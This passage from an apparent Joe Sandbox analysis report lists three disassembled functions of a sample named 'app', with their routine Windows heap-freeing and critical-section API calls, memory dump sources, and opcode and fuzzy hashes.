                                                                                                                                              • Opcode ID: 781063ac87fbfd1d4cad2045dae12bfd37df52046da3970f80f829b7a7e5edd2
                                                                                                                                              • Instruction ID: 00585c3f01842366698a5c53355d7c0cceb2ecdc2162a53b836031793970d5b4
                                                                                                                                              • Opcode Fuzzy Hash: 781063ac87fbfd1d4cad2045dae12bfd37df52046da3970f80f829b7a7e5edd2
                                                                                                                                              • Instruction Fuzzy Hash: E9116D742426029FDB718F28FC85D627BB6F7927607A4463EF252C21B0E7709846CF68
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025821B2 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582137
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582154
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582187
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258219E
                                                                                                                                                • Part of subcall function 02582374: HeapFree.KERNEL32(00000000,?,?,?,0258C1F4), ref: 02582393
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: 091f08f4e914af45332aeacaec53aa960662c8f353604cdbd1044a5cc967adfd
                                                                                                                                              • Instruction ID: e96f1bdd064c1773c8068a96364f5a95bed59fd1547a5ee151d8eb2685879632
                                                                                                                                              • Opcode Fuzzy Hash: 091f08f4e914af45332aeacaec53aa960662c8f353604cdbd1044a5cc967adfd
                                                                                                                                              • Instruction Fuzzy Hash: BA213B70145B80DFEB76AB30D808BE6BFA1BF11309F04081CD6DA965A0DBB52599DB4A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0257D055 Relevance: 5.0, APIs: 4, Instructions: 50memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257D098
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257D0B5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257D0FF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257D118
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              • Opcode ID: 72b5fa6c86c356e7154a60258190070a36aef661695719103f4dbfa4692107a8
                                                                                                                                              • Instruction ID: 706b0cfbc7ff28a2cb7d53c613e15a357e0269a007d689ada88168af845d7102
                                                                                                                                              • Opcode Fuzzy Hash: 72b5fa6c86c356e7154a60258190070a36aef661695719103f4dbfa4692107a8
                                                                                                                                              • Instruction Fuzzy Hash: 17115431181A40DBDB759B24FD08BA6BBF2FF04309F140D1DE58A925A0DBB26495DF4D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042BD48 Relevance: 5.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • EnterCriticalSection.KERNEL32(0044AF54,?,00000000,?,00000000,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BD76
                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BD88
                                                                                                                                              • LeaveCriticalSection.KERNEL32(0044AF54,?,00000000,?,00000000,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BD91
                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,00000000,?,00000000,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BDA3
                                                                                                                                                • Part of subcall function 0042BCDF: InitializeCriticalSection.KERNEL32(0044AF54,0042BD56,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BCF7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterInitialize$Leave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 713024617-0
                                                                                                                                              • Opcode ID: 2f1b24a4f239d3e7a57dd448b17dc9936c7578022bdd4031e6a5dfacb9bda7aa
                                                                                                                                              • Instruction ID: f612f0568f59398d43542fae4ddb9eea5b0bce547e4844d3ce0b5f2d18dd5514
                                                                                                                                              • Opcode Fuzzy Hash: 2f1b24a4f239d3e7a57dd448b17dc9936c7578022bdd4031e6a5dfacb9bda7aa
                                                                                                                                              • Instruction Fuzzy Hash: 10F06D7A11022AEFE7109F94FC84BA2B3ACFB11316FC0043BE50482011D738A869CAEC
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%